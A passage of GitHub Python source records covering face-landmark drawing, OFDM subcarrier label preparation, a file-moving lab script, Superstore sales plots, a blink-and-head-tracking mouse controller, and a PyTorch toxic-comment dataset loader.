int(landmark.y * image.shape[0])) for landmark in results.face_landmarks.landmark]\n\n # Draw only the right and left eye keypoints\n draw_specific_keypoints(image, keypoints, REYE, (0, 0, 255)) # Drawing right eye with red color\n draw_specific_keypoints(image, keypoints, LEYE, (0, 255, 0)) # Drawing left eye with green color\n draw_specific_keypoints(image, keypoints, NOSE, (0, 155, 0)) # Drawing left eye with green color\n draw_specific_keypoints(image, keypoints, SLIP, (0, 155, 255)) # Drawing left eye with green color\n\nif results.pose_landmarks:\n keypoints = [(int(landmark.x * image.shape[1]), int(landmark.y * image.shape[0])) for landmark in results.pose_landmarks.landmark]\n draw_specific_keypoints(image, keypoints, POSE, (0, 255, 0)) # Drawing left eye with green color\n\n\n\n\ncv2.imshow(\"Keypoints Image\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"asiri1ndatissa/ssl_ml_2023","sub_path":"drawfacekp.py","file_name":"drawfacekp.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73755852414","text":"# @.@ coding : utf-8 ^-^\n# @Author : Leon Rein\n# @Time : 2021-03-09 ~ 18:50 \n# @File : 2.parallel_data_64.py\n# @Software : PyCharm\n# @Notice : It's a WINDOWS version!\n# 从原始码元中间插入 DC 置零, 插入前 6 个后 5 个置零的虚拟子载波作为保护,\n# 在下标 -21, -7, 7, 21 处插入导频 3 (当作 1 + i)\n\n\"\"\"\n输入: labels48_test.csv\n\n输出: labels64_test.csv\n 一个 CSV 表格文件, 共 1000 行 64 列, 每一行如下\n 下标 [0:6] 共 6 个为置零子载波, 为 0;\n 下标 [6:11] 共 5 个为数据位置;\n 下标 [11] 是第一个导频, 为 3;\n 下标 [12:25] 共 13 个为数据位置;\n 下标 [25] 是第二个导频, 为 3;\n 下标 [26:32] 共 6 个为数据位置;\n 下标 [32] 为中间直流子载波置零, 为 0;\n 下标 [33:39] 共 6 个为数据位置;\n 下标 [39] 是第三个导频, 为 3;\n 下标 [40:53] 共 13 个为数据位置;\n 下标 [53] 是第四个导频, 为 3;\n 下标 [54:59] 共 5 个为数据位置;\n 下标 [59:64] 共 5 个为置零子载波, 为 0.\n\n labels64_train.npy\n 基本同上, 除了行数为 10000.\n\n labels64_onehot_test.npy\n 1000 行 64*4=256 列; 任意某行的 256 个元素中, 每 4 个为一组 onehot 编码.\n\n labels64_onehot_train.npy\n 基本同上, 除了行数为 10000.\n\n\"\"\"\n\nimport numpy as np\n\noriginal_48_test = np.loadtxt(\"./data_sets/labels48_test.csv\", 
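Worked examples for convert_to_datetime_format from the Common.py record above; the import path is hypothetical.

import datetime as dt
from Common import convert_to_datetime_format  # hypothetical import path

assert convert_to_datetime_format("2023-05-01") == dt.datetime(2023, 5, 1)
assert convert_to_datetime_format("2023-05-01 13:45:10") == dt.datetime(2023, 5, 1, 13, 45, 10)
# Any other shape, e.g. "01/05/2023", raises the combined ValueError.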
delimiter=\",\").astype(np.int)\noriginal_64_test = np.zeros(shape=(1000, 64), dtype=np.int)\noriginal_64_test[:, 6:11] = original_48_test[:, 0:5]\noriginal_64_test[:, 11] = 3\noriginal_64_test[:, 12:25] = original_48_test[:, 5:18]\noriginal_64_test[:, 25] = 3\noriginal_64_test[:, 26:32] = original_48_test[:, 18:24]\noriginal_64_test[:, 33:39] = original_48_test[:, 24:30]\noriginal_64_test[:, 39] = 3\noriginal_64_test[:, 40:53] = original_48_test[:, 30:43]\noriginal_64_test[:, 53] = 3\noriginal_64_test[:, 54:59] = original_48_test[:, 43:48]\n\noriginal_48_train = np.load(\"./data_sets/labels48_train.npy\")\noriginal_64_train = np.zeros(shape=(10000, 64), dtype=np.int)\noriginal_64_train[:, 6:11] = original_48_train[:, 0:5]\noriginal_64_train[:, 11] = 3\noriginal_64_train[:, 12:25] = original_48_train[:, 5:18]\noriginal_64_train[:, 25] = 3\noriginal_64_train[:, 26:32] = original_48_train[:, 18:24]\noriginal_64_train[:, 33:39] = original_48_train[:, 24:30]\noriginal_64_train[:, 39] = 3\noriginal_64_train[:, 40:53] = original_48_train[:, 30:43]\noriginal_64_train[:, 53] = 3\noriginal_64_train[:, 54:59] = original_48_train[:, 43:48]\n\n# Save data set\n# np.savetxt(\"./data_sets/labels64_test.csv\", original_64_test, delimiter=',', fmt=\"%d\")\n# np.save(\"./data_sets/labels64_train.npy\", original_64_train)\n# original_64_train = np.load(\"./data_sets/labels64_train.npy\") # load the data set\n\n\n# Transform original_64 into onehot vector. ONLY for 4th order modulation!!\n# 0->[1 0 0 0], 1->[0 1 0 0], 2->[0 0 1 0], 3->[0 0 0 1]\ndef one_hot_mapping(x, num_classes=4):\n mapping_list = np.eye(num_classes)\n return mapping_list[x]\n\n\noriginal_64_onehot_test = np.array([one_hot_mapping(i) for i in original_64_test])\noriginal_64_onehot_test = original_64_onehot_test.reshape(original_64_test.shape[0], -1)\n\noriginal_64_onehot_train = np.array([one_hot_mapping(i) for i in original_64_train])\noriginal_64_onehot_train = original_64_onehot_train.reshape(original_64_train.shape[0], -1)\n\n# Save the result\n# np.save(\"./data_sets/labels64_onehot_test.npy\", original_64_onehot_test)\n# original_64_onehot_test = np.load(\"./data_sets/labels64_onehot_test.npy\") # load the data set\n# np.save(\"./data_sets/labels64_onehot_train.npy\", original_64_onehot_train)\n# original_64_onehot = np.load(\"./data_sets/labels64_onehot_train.npy\") # load the data set\n\n","repo_name":"LEON-REIN/channel_estimation","sub_path":"2.parallel_data_64.py","file_name":"2.parallel_data_64.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"79"} +{"seq_id":"41813265388","text":"#!/usr/bin/env python3\nimport shutil\nimport os\n\ndef main():\n #setting path to work from\n os.chdir('/home/student/mycode/labs/')\n \n #moving obj\n shutil.move('raynor.obj', 'ceph_storage/')\n\n #renaming file\n xname = input('What is the new name for kerrigan.obj? 
')\n shutil.move('ceph_storage/kerrigan.obj', 'ceph_storage/' + xname)\n\nmain()\n","repo_name":"ejbanda/mycode","sub_path":"labs/moveplease01.py","file_name":"moveplease01.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33067913923","text":"import matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom prettytable import PrettyTable\r\nfrom matplotlib.gridspec import GridSpec\r\nsns.set_style(\"whitegrid\")\r\n\r\n# Q1.\r\ndf=pd.read_excel(\"Sample - Superstore.xls\")\r\ndf=df.drop(['Row ID', 'Order ID', 'Customer ID','Customer Name', 'Postal Code',\r\n'Product ID','Order Date', 'Ship Date', 'Country', 'Segment'], axis=1)\r\nprint(df.head().to_string())\r\n\r\n# Q2.\r\ndf_agg = df.groupby('Category').sum().reset_index()\r\nprint(df_agg)\r\nfig,ax=plt.subplots(2,2, figsize=(18,18))\r\nax[0,0].pie(x=df_agg['Sales'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0.4,0],textprops={'fontsize':30})\r\nax[0,0].set_title(\"Total sales of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[0,1].pie(x=df_agg['Quantity'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0,0.4],textprops={'fontsize':30})\r\nax[0,1].set_title(\"Total units sold of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[1,0].pie(x=df_agg['Discount'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0,0.4],textprops={'fontsize':30})\r\nax[1,0].set_title(\"Total discount of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[1,1].pie(x=df_agg['Profit'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0.4,0,0],textprops={'fontsize':30})\r\nax[1,1].set_title(\"Total profit of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nplt.show()\r\nprint(\"In total sales plot (ax[0,0]), the maximum category is Technology and minimum category is Office supplies\")\r\nprint(\"In total quantity plot (ax[0,1]), the maximum category is Office supplies and minimum category is Technology\")\r\nprint(\"In total discount plot (ax[1,0]), the maximum category is Office supplies and minimum category is Technology\")\r\nprint(\"In total profit plot (ax[1,1]), the maximum category is Technology and minimum category is Furniture\")\r\n\r\n# Q3.\r\npt=PrettyTable()\r\npt.title=\"Super store - Category\"\r\npt.field_names=['','Sales($)','Quantity','Discount($)','Profit($)']\r\nfor i in range(len(df_agg)):\r\n row=[df_agg.loc[i,'Category'],round(df_agg.loc[i,'Sales'],2),round(df_agg.loc[i,'Quantity'],2),round(df_agg.loc[i,'Discount'],2),round(df_agg.loc[i,'Profit'],2)]\r\n pt.add_row(row)\r\nrow=['Maximum value',round(max(df_agg['Sales']),2),round(max(df_agg['Quantity']),2),round(max(df_agg['Discount']),2),round(max(df_agg['Profit']),2)]\r\npt.add_row(row)\r\nrow=['Minimum value',round(min(df_agg['Sales']),2),round(min(df_agg['Quantity']),2),round(min(df_agg['Discount']),2),round(min(df_agg['Profit']),2)]\r\npt.add_row(row)\r\nrow=['Maximum feature','Technology','Office supplies','Office supplies','Technology']\r\npt.add_row(row)\r\nrow=['Minimum feature','Office supplies','Furniture','Technology','Furniture']\r\npt.add_row(row)\r\nprint(pt)\r\n\r\n# 
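One small design note on the rename step in moveplease01.py above: building the destination with os.path.join is the more portable spelling of the string concatenation used there. A sketch:

import os
import shutil

def rename_in_ceph(old_name: str, new_name: str, storage_dir: str = "ceph_storage") -> None:
    # shutil.move doubles as a rename when dst names the new file.
    shutil.move(os.path.join(storage_dir, old_name),
                os.path.join(storage_dir, new_name))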
Q4.\r\ndf_agg1=df.groupby('Sub-Category').sum().reset_index()\r\ndf_agg1=df_agg1.sort_values(by='Sales',ascending=False).iloc[:10,:]\r\nf,ax=plt.subplots(figsize=(20,8))\r\nax.bar(x=df_agg1['Sub-Category'],height=df_agg1['Sales'],width=0.4,edgecolor='blue',color='#95DEE3',label='Sales')\r\nax.plot(df_agg1['Sub-Category'],df_agg1['Profit'],color='red',linewidth=4,marker='o',label='Profit')\r\nplt.title(\"Profit and Sales per sub-category\",fontsize=30)\r\nfor i,j in zip(df_agg1['Sub-Category'],df_agg1['Sales']):\r\n if j>250000:\r\n ax.text(i,j-80000,'$'+str(round(j,2)),ha='center',va='bottom',rotation=90,fontsize=20)\r\n else:\r\n ax.text(i,j,'$'+str(round(j, 2)),ha='center',va='bottom',rotation=90,fontsize=20)\r\nax2 = ax.twinx()\r\nax.tick_params(labeltop=False,labelright=True,labelsize=20)\r\nax2.set_ylabel(\"USD($)\",fontsize=25,labelpad=70)\r\nax.set_xlabel(\"Sub_category\",fontsize=25)\r\nax.set_ylabel(\"USD($)\",fontsize=25)\r\nyticks=list(np.arange(-50000,400000,50000))\r\nax2.tick_params(labelsize=20)\r\nax.set_yticks(yticks)\r\nax2.set_yticks([])\r\nplt.grid()\r\nax.legend(bbox_to_anchor=(1.08,1.1),loc='upper right')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Q5.\r\nx = np.linspace(0, 2 * np.pi, 100) # 100 points between 0 and 2π\r\ny = np.sin(x)\r\ny_cos = np.cos(x)\r\nplt.plot(x,y,'b--',label='sine wave',linewidth=3)\r\nplt.plot(x,y_cos,'r-.',label='cosine wave',linewidth=3)\r\nplt.fill_between(x,y,y_cos,where=(y>y_cos),interpolate=True,color='green',alpha=0.3)\r\nplt.fill_between(x,y,y_cos,where=(y',color='green',ls='dashed'),\r\n fontsize=10,fontfamily='serif',weight='bold')\r\nplt.xlabel('x-axis',fontfamily='serif',fontsize=15,color='darkred')\r\nplt.ylabel('y-axis',fontfamily='serif',fontsize=15,color='darkred')\r\nplt.title('Fill between x-axis and plot line',fontfamily='serif',fontsize=20,color='blue')\r\nplt.grid(True)\r\nplt.legend(loc='lower left',prop=FontProperties(size=15))\r\nplt.xticks(fontweight='bold')\r\nplt.yticks(fontweight='bold')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Q6.\r\nx = np.linspace(-4, 4, 800)\r\ny = np.linspace(-4, 4, 800)\r\nX, Y = np.meshgrid(x, y)\r\nZ = np.sin(np.sqrt(X*X + Y*Y))\r\nfig = plt.figure(figsize=(10,10))\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(X, Y, Z, cmap='coolwarm',alpha=1,linewidth=0)\r\nax.contour(X, Y, Z, zdir='z', offset=-6, cmap='coolwarm',linewidths=1)\r\nax.contour(X, Y, Z, zdir='x', offset=-5, cmap='coolwarm',linewidths=1)\r\nax.contour(X, Y, Z, zdir='y', offset= 5, cmap='coolwarm',linewidths=1)\r\nax.set(xlim=(-5, 5), ylim=(-5, 5), zlim=(-6, 2), xlabel='X', ylabel='Y', zlabel='Z')\r\nax.set_xlabel('X Label',fontfamily='serif',fontsize=15,color='darkred')\r\nax.set_ylabel('Y Label',fontfamily='serif',fontsize=15,color='darkred')\r\nax.set_zlabel('Z Label',fontfamily='serif',fontsize=15,color='darkred')\r\n# ax.set_zticks(list(np.arange(-6,3,1)))\r\nax.set_yticks(list(np.arange(-5,6,1)))\r\nax.set_xticks(list(np.arange(-5,6,1)))\r\nax.set_title(r'Surface plot of z = sin$\\sqrt{x^2+y^2}$',fontfamily='serif',fontsize=25,color='blue')\r\n# plt.tight_layout()\r\nplt.show()\r\n\r\n# Q7.\r\nf=plt.figure(figsize=(9,7))\r\ngs=GridSpec(2,2)\r\nprint(df_agg1.head().to_string())\r\nx=np.arange(len(df_agg1['Sub-Category']))\r\nax0=plt.subplot(gs[0,:])\r\nax0.bar(x-0.2,df_agg1['Sales'],0.4,edgecolor='blue',color='#95DEE3',label='Sales')\r\nax0.bar(x+0.2,df_agg1['Profit'],0.4,edgecolor='red',color='lightcoral',label='Profit')\r\nax0.set_title(\"Sales and Profit per 
sub-category\",fontsize=15)\r\nax0.set_xlabel(\"Sub-Category\")\r\nax0.set_ylabel(\"USD($)\")\r\nax0.set_yticks(list(np.arange(-50000,400000,50000)))\r\nax0.set_xticks(list(x))\r\nax0.set_xticklabels(list(df_agg1['Sub-Category'].unique()))\r\nax0.tick_params(axis='x', labelsize=10) # Set the size of x-axis tick labels\r\nax0.tick_params(axis='y', labelsize=10)\r\nax0.legend()\r\n\r\nax2=plt.subplot(gs[1,0])\r\nax2.pie(x=df_agg['Sales'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\")\r\nax2.set_title('Sales',fontsize=15)\r\nax2=plt.subplot(gs[1,1])\r\nax2.pie(x=df_agg['Profit'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\")\r\nax2.set_title('Profit',fontsize=15)\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"Ferogle/Information_Visualization","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20093807103","text":"# USAGE\n# python video_facial_landmarks.py --shape-predictor shape_predictor_68_face_landmarks.dat\n\nimport argparse\nimport time\n\nimport cv2\nimport dlib\nimport pyautogui\nfrom imutils import face_utils\n# import the necessary packages\nfrom imutils.video import VideoStream\nimport imutils\nfrom scipy.spatial import distance as dist\n\n\ndef eye_aspect_ratio(eye):\n # compute the euclidean distances between the two sets of\n # vertical eye landmarks (x, y)-coordinates\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n\n # compute the euclidean distance between the horizontal\n # eye landmark (x, y)-coordinates\n C = dist.euclidean(eye[0], eye[3])\n\n return (A + B) / (2.0 * C)\n\n\npyautogui.FAILSAFE = False\nBLINK_AR_THRESH = 0.25\nEYE_AR_CONSEC_FRAMES = 3\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n help=\"path to facial landmark predictor\")\nargs = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n# grab the indexes of the facial landmarks for the left and\n# right eye, respectively\n(left_eye_start, left_eye_end) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(right_eye_start, right_eye_end) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n\n# initialize the video stream and allow the cammera sensor to warmup\nprint(\"[INFO] camera sensor warming up...\")\nvs = VideoStream().start()\ntime.sleep(2.0)\n\nframe_count = 0\nvert_zero = 0\nhoriz_zero = 0\nvert_acc = 0\nhoriz_acc = 0\n\nblink_frame_counter = 0\ntotal_blinks = 0\n\n\n# loop over the frames from the video stream\nwhile True:\n # grab the frame from the threaded video stream, resize it to\n # have a maximum width of 400 pixels, and convert it to\n # grayscale\n frame = vs.read()\n frame = imutils.resize(frame,width= 400)\n frame_count += 1\n # frame = imutils.resize(frame, width=400)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale frame\n rects = detector(gray, 0)\n\n for rect in rects:\n\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n leftEyeCorner = shape[39]\n leftEyebrowCorner = 
shape[21]\n noseTop = shape[27]\n\n vertical_diff = leftEyeCorner[1] - leftEyebrowCorner[1]\n horizontal_diff = noseTop[0] - leftEyeCorner[0]\n v_diff = vert_zero - vertical_diff\n h_diff = horiz_zero - horizontal_diff\n if frame_count < 100:\n vert_acc += vertical_diff\n horiz_acc += horizontal_diff\n else:\n horiz_zero = int(horiz_acc / 100)\n vert_zero = int(vert_acc / 100)\n h_movement = 0 if abs(h_diff) < 7 else h_diff\n v_movement = 0 if abs(v_diff) < 3 else v_diff\n pyautogui.moveRel(h_movement, v_movement)\n\n left_eye = shape[left_eye_start:left_eye_end]\n right_eye = shape[right_eye_start:right_eye_end]\n ear = (eye_aspect_ratio(left_eye) + eye_aspect_ratio(right_eye)) / 2.0\n if ear < BLINK_AR_THRESH:\n blink_frame_counter += 1\n else:\n if blink_frame_counter > EYE_AR_CONSEC_FRAMES:\n # blink is detected\n total_blinks += 1\n pyautogui.click()\n blink_frame_counter = 0\n\n # loop over the (x, y)-coordinates for the facial landmarks\n # and draw them on the image\n for (x, y) in shape:\n cv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\n\n # show the frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n","repo_name":"mflis/head-pointer","sub_path":"video_facial_landmarks.py","file_name":"video_facial_landmarks.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36925145178","text":"import pandas as pd\nimport numpy as np\nimport re\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils import data as td\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import f1_score\n\nimport tqdm\nimport time\n\nclass ToxicTextsDataset(td.Dataset):\n def __init__(self, data_path='train.csv', \n n_train_batches=16000, \n n_test_batches=4000,\n n_valid_batches=1600,\n separate_test_and_valid=True,\n test_size=0.2,\n valid_size=0.1,\n batch_size=10, \n vocab_size=2000,\n mode='train',\n random_seed=None,\n verbose=0,\n use_cuda = True):\n \"\"\"\n INPUT:\n n_train_batches - int, number of batches to be drawn from data for training\n n_test_batches - int, number of batches to be drawn from data for testing\n n_valid_batches - int, number of batches to be drawn from data for validation\n separate_test_and_valid - bool, wherever to draw training, testing and validation \n from all data or from separated parts of data (a chance \n of intersection between training, testing and validation \n data if False)\n test_size - float from [0, 1], a portion of initial data reserved for creating \n dataset for testing. Not aplicable if separate_test_and_valid=False\n valid_size - float from [0, 1], a portion of initial data reserved for creating \n dataset for validation. Not aplicable if separate_test_and_valid=False\n batch_size - int, number of samples in one minibatch\n vocab_size - int, number of unique tokens to save and embed. Saved [vocab_size] \n most frequently encountered tokens, all others will be encoded as \n UNKNOWN token\n mode = string, one from ['train', 'test', 'valid']. 
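A worked check of eye_aspect_ratio from the record above on a synthetic six-point eye in dlib's p0..p5 ordering; an open eye lands well above the script's 0.25 blink threshold.

import numpy as np
from scipy.spatial import distance as dist

def eye_aspect_ratio(eye):
    A = dist.euclidean(eye[1], eye[5])   # vertical distance, outer pair
    B = dist.euclidean(eye[2], eye[4])   # vertical distance, inner pair
    C = dist.euclidean(eye[0], eye[3])   # horizontal distance
    return (A + B) / (2.0 * C)

open_eye = np.array([(0, 0), (1, 2), (2, 2), (3, 0), (2, -2), (1, -2)])
print(round(eye_aspect_ratio(open_eye), 3))   # 1.333, i.e. eye open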
Determinedes from which dataset \n will be returned sample on ToxicTextsDataset[i]\n verbose - int, 0 for no printed info, 1 for minimum info, 2 for maximum info\n \n \"\"\"\n super(ToxicTextsDataset, self).__init__()\n \n self.n_train_batches = n_train_batches\n self.n_test_batches = n_test_batches\n self.n_valid_batches = n_valid_batches\n self.separate_test_and_valid = separate_test_and_valid\n self.test_size = test_size\n self.valid_size = valid_size\n self.batch_size = batch_size\n self.vocab_size = vocab_size\n self.mode = mode\n self.verbose = verbose\n self.use_cuda = use_cuda\n \n if(random_seed != None):\n np.random.seed(random_seed)\n \n if(verbose): print('Downloading data from ' + data_path + '... ', end='')\n # read csv file\n df = pd.read_csv(data_path)\n if(verbose): print('Completed')\n \n # separate text from class labels\n X = np.array(df.iloc[:, 1])\n y = np.array(df.iloc[:, 2:])\n \n if(verbose): print('Generating vocabulary... ', end='')\n # generating vocabulary of tokens\n self.CreateTokenVocab(X, y)\n if(verbose): print('Completed')\n \n if(separate_test_and_valid == True):\n # split data for\n X_train, X, y_train, y = train_test_split(X, y, test_size=valid_size + test_size)\n \n if(verbose): print('Creating train dataset... ', end='')\n self.train_dataset = self.CreateBalancedDataset(X_train, y_train, n_train_batches)\n if(verbose): print('Completed')\n \n if(test_size != 0 and valid_size != 0):\n X_test, X_valid, y_test, y_valid = train_test_split(X, y, \n test_size=valid_size/(test_size+valid_size))\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X_test, y_test, n_test_batches)\n if(verbose): print('Completed')\n if(verbose): print('Creating validation dataset... ', end='')\n self.valid_dataset = self.CreateBalancedDataset(X_valid, y_valid, n_valid_batches)\n if(verbose): print('Completed')\n \n elif(test_size == 0):\n X_valid = X\n y_valid = y\n \n if(verbose): print('Creating validation dataset... ', end='')\n self.valid_dataset = self.CreateBalancedDataset(X_valid, y_valid, n_valid_batches)\n if(verbose): print('Completed')\n \n self.test_dataset = [] \n \n elif(valid_size == 0):\n X_test = X\n y_test = y\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X_test, y_test, n_test_batches)\n if(verbose): print('Completed')\n \n self.valid_dataset = [] \n \n elif(separate_test_and_valid == False):\n \n if(verbose): print('Creating train dataset... ', end='')\n self.train_dataset = self.CreateBalancedDataset(X, y, n_train_batches)\n if(verbose): print('Completed')\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X, y, n_test_batches)\n if(verbose): print('Completed')\n \n if(verbose): print('Creating validation dataset... 
', end='')\n self.valid_dataset = self.CreateBalancedDataset(X, y, n_valid_batches)\n if(verbose): print('Completed')\n \n \n def encode(self, text):\n \"\"\" function that splits text into tokens and returns a list of encodings for \n each token \n INPUT: text - python string\n OUTPUT: codes - list of integers, \n cl_features - list of floats (character level features)\n \"\"\"\n tokens = self.Smart_Split(text)\n codes = []\n cl_features = self.ComputeCharacterLevelFeatures(text)\n for token in tokens:\n if(self.word_to_id.get(token) != None):\n codes.append(self.word_to_id[token])\n else:\n codes.append(self.vocab_size - 1) # UNKNOWN token\n return codes, cl_features\n \n def ComputeCharacterLevelFeatures(self, text):\n \"\"\"This function computes a character level features \n INPUT: text - a python string\n OUTPUT: cl_features - a list of floats\n \n cl_features[0] - lenght of text\n cl_features[1] - mean of lenghts of all tokens in text\n cl_features[2] - ratio of capital letters in text\n cl_features[3] - ratio of non-letter symbols in text\n \"\"\"\n text_len = float(len(text))\n \n cl_features = [\n text_len,\n np.mean([len(token) for token in self.Smart_Split(text)]),\n len(re.findall(r'[A-Z]', text)) / text_len,\n (1. - len(re.findall(r'[a-zA-Z]', text)) / text_len)\n ]\n \n return cl_features\n \n def CreateBalancedDataset(self, X, y, n_batches):\n \"\"\"This functions returns a balanced dataset (a list of batched samples with \n corresponding labels). Produced dataset is drawn with repetition from initial data, \n and therefore can contain duplicates Depending on n_batches, it will do either \n undersampling, oversampling or combination of both\n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed text \n as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels (label != 0 is assumed to be \"interesting\" )\n n_batches - integer, number of batches in dataset (so the number of samples \n in dataset is equal to n_batches * batch_size = len(dataset) * batch_size)\n OUTPUT:\n dataset - list of dictionaries where dataset[i]['input'] is a i-th batch \n of inputs and dataset[i]['labels'] - corresponding batch of labels\"\"\"\n dataset = []\n masks = self.MakeMasks(y)\n n_subbatches = n_batches // len(masks)\n \n if(self.verbose >= 2): print('\\n')\n \n for mask in masks:\n if(self.verbose >= 2): print('\\tApplying mask: ' + mask['name'] + '... ', end='')\n dataset += self.CreateDatasetFromXY(X[mask['mask']], y[mask['mask']], n_subbatches)\n if(self.verbose >= 2): print('Completed')\n \n return shuffle(dataset)\n \n def CreateDatasetFromXY(self, X, y, n_batches):\n \"\"\"\n This functions constructs and returns a dataset (a list of batched samples \n with corresponding labels). \n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed \n text as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels\n n_batches - integer, number of batches in dataset (so the number \n of samples in dataset is equal to n_batches * batch_size = \n len(dataset) * batch_size)\n OUTPUT:\n dataset - list of dictionaries where dataset[i]['input'] is a i-th \n batch of inputs and dataset[i]['labels'] - corresponding \n batch of labels\n \n \"\"\"\n # we sort our samples on the lenght of the text (in the number of tokens) and \n # place texts of the same lenght in the same position in this dictionary. 
\n # This can be also viewed as a hash-table\n Len_table = dict()\n for i in range(len(X)):\n codes, cl_features = self.encode(X[i])\n if(Len_table.get(len(codes)) != None):\n Len_table[len(codes)].append((codes, cl_features, y[i]))\n else: \n Len_table[len(codes)] = [(codes, cl_features, y[i])]\n \n # we have different number of samples of different lenght. There is a lot more \n # samples of lenght ~10-50 tokens and much smaller number of samples of lenght \n # 100+ tokens. Now we will get a distribution of number of samples:\n dist = np.array([[i, len(Len_table[i])] for i in Len_table.keys()])\n # here dist[i, 0] is some lenght of sample we encountered in dataset\n # and dist[i, 1] is a number of samples of that lenght \n \n p = dist[:, 1] / np.sum(dist[:, 1])\n \n # we will construct actual dataset, randomly drawing samples from that distribution:\n dataset = []\n for _ in range(n_batches):\n i = np.random.choice(dist[:, 0], p=p)\n sample_indices = np.random.randint(0, len(Len_table[i]), self.batch_size)\n # it took me some time to figure out correct transformation from mess of \n # lists and numpy array to torch tensor :)\n if(self.use_cuda):\n batch = {'input':Variable(torch.LongTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 0].tolist())), \n requires_grad=False).cuda(),\n 'cl_features':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 1].tolist())), \n requires_grad=False).cuda(),\n 'labels':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 2].tolist())), \n requires_grad=False).cuda()}\n else:\n batch = {'input':Variable(torch.LongTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 0].tolist())), \n requires_grad=False),\n 'cl_features':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 1].tolist())), \n requires_grad=False),\n 'labels':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 2].tolist())), \n requires_grad=False)}\n \n dataset.append(batch) \n \n return dataset\n \n def CreateTokenVocab(self, X, y):\n '''This function generates a word_to_id dictionary we use for encoding text\n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed \n text as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels (label != 0 is assumed to be \"interesting\" - \n we prioretize tokens encoundered in examples with at least one label = 1)\n \n '''\n token_freq = dict()\n\n # firstly we exctract all tokens we see in positivly labeled samples\n X_relevant = X[np.sum(y, axis=1) > 0] \n X_relevant += shuffle(X[np.sum(y, axis=1) == 0])[:len(X_relevant)] \n # we add random portion of \"all-negative\" data of equal size \n \n for text in X_relevant:\n tokens = self.Smart_Split(text)\n\n for token in tokens:\n if(token_freq.get(token) == None):\n token_freq[token] = 1\n else: token_freq[token] += 1\n\n tokens = sorted(token_freq, key=token_freq.get)[::-1]\n\n # secondly, we assign id's to the most frequently encountered tokens in positivly \n # classified samples\n self.word_to_id = dict()\n for i in range(self.vocab_size - 1):\n self.word_to_id[tokens[i]] = i\n\n # finally, we would like to find very similar tokens and assign to them the \n # same id (those are mainly misspells and parsing \n # innacuracies. 
